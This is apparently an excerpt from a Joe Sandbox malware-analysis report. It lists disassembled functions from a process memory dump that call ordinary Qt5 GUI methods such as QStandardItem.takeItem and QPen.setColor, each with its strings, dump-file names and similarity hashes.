Function 00007FFD86244A70 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 45COMMON

Download Yara Rule

APIs

?takeItem@QStandardItemModel@@QEAAPEAVQStandardItem@@HH@Z.QT5GUI ref: 00007FFD86244AEF

Strings

Bi|i, xrefs: 00007FFD86244AB6
QStandardItemModel, xrefs: 00007FFD86244B35
takeItem, xrefs: 00007FFD86244B2E
takeItem(self, row: int, column: int = 0) -> Optional[QStandardItem], xrefs: 00007FFD86244B22

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Standard$?takeItemItem@Item@@Model@@
String ID: Bi|i$QStandardItemModel$takeItem$takeItem(self, row: int, column: int = 0) -> Optional[QStandardItem]
API String ID: 3606076992-4101235967
Opcode ID: 6ea4c10e67cb1aef262489288730f5962e6b60971f6621199c828f5182408adc
Instruction ID: f199886856223cb6c58bf9b18202125c9db72976618f72522e7a780a54628f3d
Opcode Fuzzy Hash: 6ea4c10e67cb1aef262489288730f5962e6b60971f6621199c828f5182408adc
Instruction Fuzzy Hash: E4210476B0CB46C5EB009F15E8987AD33A8FB487A0F954136CA9D43320EF39D959C740

Function 00007FFD862AAEC0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 45COMMON

Download Yara Rule

APIs

?setFormat@QTextDocumentWriter@@QEAAXAEBVQByteArray@@@Z.QT5GUI ref: 00007FFD862AAF30

Strings

QTextDocumentWriter, xrefs: 00007FFD862AAF8A
setFormat, xrefs: 00007FFD862AAF83
BJ1, xrefs: 00007FFD862AAED5
setFormat(self, format: Union[QByteArray, bytes, bytearray]), xrefs: 00007FFD862AAF77

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?setArray@@@ByteDocumentFormat@TextWriter@@
String ID: BJ1$QTextDocumentWriter$setFormat$setFormat(self, format: Union[QByteArray, bytes, bytearray])
API String ID: 952424838-1717532674
Opcode ID: da1f2e71954a4a20d2f01e63ce25853245ff4bf3c2bcfc545e68f1aa9440babd
Instruction ID: 8a1071618782e989a7019aff1ee22e756e42f3f066829fe308db7890232c462e
Opcode Fuzzy Hash: da1f2e71954a4a20d2f01e63ce25853245ff4bf3c2bcfc545e68f1aa9440babd
Instruction Fuzzy Hash: 4621E576B08F46C5DB509F15E8981AD33B4FB48BA0F954176CA9D83320EF39D989C740

Function 00007FFD862A4F50 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 45COMMON

Download Yara Rule

APIs

?sortChildren@QStandardItem@@QEAAXHW4SortOrder@Qt@@@Z.QT5GUI ref: 00007FFD862A4FDA

Strings

sortChildren(self, column: int, order: Qt.SortOrder = Qt.AscendingOrder), xrefs: 00007FFD862A5000
Bi|E, xrefs: 00007FFD862A4F9D
QStandardItem, xrefs: 00007FFD862A5013
sortChildren, xrefs: 00007FFD862A500C

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?sortChildren@Item@@Order@Qt@@@SortStandard
String ID: Bi|E$QStandardItem$sortChildren$sortChildren(self, column: int, order: Qt.SortOrder = Qt.AscendingOrder)
API String ID: 3170698060-917684851
Opcode ID: 857a16e1c8d1d1e00899576e6a6ee464f5658219033854ab517e2bd7e7744389
Instruction ID: ee4077f9310d1984df6ab1c66b3052d594495f1a6e084c9dd92dd07c7437a95f
Opcode Fuzzy Hash: 857a16e1c8d1d1e00899576e6a6ee464f5658219033854ab517e2bd7e7744389
Instruction Fuzzy Hash: 7B21F336B0CB4595EB109F55E8987AD33B8FB487A0F914236CA9D43720EF39D959C700

Function 00007FFD86260F20 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 45COMMON

Download Yara Rule

APIs

?setColor@QPen@@QEAAXAEBVQColor@@@Z.QT5GUI ref: 00007FFD86260F90

Strings

setColor(self, color: Union[QColor, Qt.GlobalColor]), xrefs: 00007FFD86260FD7
setColor, xrefs: 00007FFD86260FE3
QPen, xrefs: 00007FFD86260FEA
BJ1, xrefs: 00007FFD86260F35

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?setColor@Color@@@Pen@@
String ID: BJ1$QPen$setColor$setColor(self, color: Union[QColor, Qt.GlobalColor])
API String ID: 2544635927-1413486124
Opcode ID: 89eb0050814aa38c18789283f78346f64f2ac7f26cc9f941061b4ec321d9df4b
Instruction ID: ca697d557c06c1e5e8a8b8b1cb5aa047d811649dd76f022bb08b68f1ab26c8f4
Opcode Fuzzy Hash: 89eb0050814aa38c18789283f78346f64f2ac7f26cc9f941061b4ec321d9df4b
Instruction Fuzzy Hash: AB210276B08B46C5DB109F15E8982AE33B4FB48BA0F954176CA9D43320EF39E949C780

Function 00007FFD862A6FA0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 45COMMON

Download Yara Rule

APIs

?setWhatsThis@QStandardItem@@QEAAXAEBVQString@@@Z.QT5GUI ref: 00007FFD862A7010

Strings

setWhatsThis, xrefs: 00007FFD862A7063
setWhatsThis(self, awhatsThis: Optional[str]), xrefs: 00007FFD862A7057
QStandardItem, xrefs: 00007FFD862A706A
BJ1, xrefs: 00007FFD862A6FB5

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?setItem@@StandardString@@@This@Whats
String ID: BJ1$QStandardItem$setWhatsThis$setWhatsThis(self, awhatsThis: Optional[str])
API String ID: 4256179542-331491994
Opcode ID: 3cb1e2893a9e594120504682505552914480d6591c0ccdacae0fffe669f03a93
Instruction ID: 0c7d1e954072dd429367da779c7f858a62e93fda51b8f0200a9e7b00fc3590d5
Opcode Fuzzy Hash: 3cb1e2893a9e594120504682505552914480d6591c0ccdacae0fffe669f03a93
Instruction Fuzzy Hash: 3F210436B0CB46C1DB109F15E8982AD33B4FB48BA0F914072CA9D43720EF39D989C340

Function 00007FFD862A9040 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 45COMMON

Download Yara Rule

APIs

?setAccessibleDescription@QStandardItem@@QEAAXAEBVQString@@@Z.QT5GUI ref: 00007FFD862A90B0

Strings

setAccessibleDescription(self, aaccessibleDescription: Optional[str]), xrefs: 00007FFD862A90F7
QStandardItem, xrefs: 00007FFD862A910A
setAccessibleDescription, xrefs: 00007FFD862A9103
BJ1, xrefs: 00007FFD862A9055

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?setAccessibleDescription@Item@@StandardString@@@
String ID: BJ1$QStandardItem$setAccessibleDescription$setAccessibleDescription(self, aaccessibleDescription: Optional[str])
API String ID: 3281177987-916155896
Opcode ID: 87bcbdccf5b0a78d19dc276e163ffd6165799932a999ced71e6922d53879bb0c
Instruction ID: 13fe66868f494bcfadd8d4a624cbfd1b32b8391c48ab7efe4a708a22889ae1ee
Opcode Fuzzy Hash: 87bcbdccf5b0a78d19dc276e163ffd6165799932a999ced71e6922d53879bb0c
Instruction Fuzzy Hash: A4210276B08B8681DB109F15E8992AD33B4FB48BA0F914072CA9D83320EF39D989C740

Function 00007FFD862A6C60 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 45COMMON

Download Yara Rule

APIs

?setStatusTip@QStandardItem@@QEAAXAEBVQString@@@Z.QT5GUI ref: 00007FFD862A6CD0

Strings

setStatusTip, xrefs: 00007FFD862A6D23
setStatusTip(self, astatusTip: Optional[str]), xrefs: 00007FFD862A6D17
QStandardItem, xrefs: 00007FFD862A6D2A
BJ1, xrefs: 00007FFD862A6C75

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?setItem@@StandardStatusString@@@Tip@
String ID: BJ1$QStandardItem$setStatusTip$setStatusTip(self, astatusTip: Optional[str])
API String ID: 50200770-2682900396
Opcode ID: 89582461245ede222d7ba2d583bb94916a20dabe134f03d4ed4d5961604bde38
Instruction ID: 04acf82567ce4fc31b3142e15cb4b7d500f8d4530450dc1ce163b17d0f57232d
Opcode Fuzzy Hash: 89582461245ede222d7ba2d583bb94916a20dabe134f03d4ed4d5961604bde38
Instruction Fuzzy Hash: 1021E276B08F4681EB109F55E8995AD33B4FB48BA0F954172CA9D83720EF39D989C740

Function 00007FFD862A0D50 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 45COMMON

Download Yara Rule

APIs

?child@QStandardItem@@QEBAPEAV1@HH@Z.QT5GUI ref: 00007FFD862A0DCF

Strings

Bi|i, xrefs: 00007FFD862A0D96
child, xrefs: 00007FFD862A0E0A
QStandardItem, xrefs: 00007FFD862A0E11
child(self, row: int, column: int = 0) -> Optional[QStandardItem], xrefs: 00007FFD862A0DFE

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?child@Item@@Standard
String ID: Bi|i$QStandardItem$child$child(self, row: int, column: int = 0) -> Optional[QStandardItem]
API String ID: 2677777147-4246156387
Opcode ID: 8ad36f30312b4093ff80e6ab1bf67e3ad7c7ef8ac35d45103e2cc5100559c25c
Instruction ID: f98ab4baa51ef1a74f3b8e8961f5aeb94b55dd549330c3ebaf7f46132336ed80
Opcode Fuzzy Hash: 8ad36f30312b4093ff80e6ab1bf67e3ad7c7ef8ac35d45103e2cc5100559c25c
Instruction Fuzzy Hash: 1B212736B0CB56C6EB408F15E8987AD33A8FB48790F928136CA9D43720DF39D949C700

Function 00007FFD86252DD0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 45COMMON

Download Yara Rule

APIs

?setRestartCommand@QSessionManager@@QEAAXAEBVQStringList@@@Z.QT5GUI ref: 00007FFD86252E40

Strings

setRestartCommand(self, a0: Iterable[Optional[str]]), xrefs: 00007FFD86252E87
setRestartCommand, xrefs: 00007FFD86252E93
QSessionManager, xrefs: 00007FFD86252E9A
BJ1, xrefs: 00007FFD86252DE5

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?setCommand@List@@@Manager@@RestartSessionString
String ID: BJ1$QSessionManager$setRestartCommand$setRestartCommand(self, a0: Iterable[Optional[str]])
API String ID: 2797735711-209993056
Opcode ID: d02a738adc2944b3a6411396db9c720c069609154783ad87c3733b149447ad5b
Instruction ID: 27ecefa957f9ef33241901033a863a63e13021b111e33bbdf30a6f46c19666ff
Opcode Fuzzy Hash: d02a738adc2944b3a6411396db9c720c069609154783ad87c3733b149447ad5b
Instruction Fuzzy Hash: BD211336B08F46C1EB509F55E8991AD33B4FB48BA0F954072CA9D83320EF39D989C740

Function 00007FFD86240E30 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 45COMMON

Download Yara Rule

APIs

?setAdditionalFormats@QTextLayout@@QEAAXAEBV?$QList@UFormatRange@QTextLayout@@@@@Z.QT5GUI ref: 00007FFD86240EA0

Strings

QTextLayout, xrefs: 00007FFD86240EFA
setAdditionalFormats, xrefs: 00007FFD86240EF3
setAdditionalFormats(self, overrides: Iterable[QTextLayout.FormatRange]), xrefs: 00007FFD86240EE7
BJ1, xrefs: 00007FFD86240E45

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
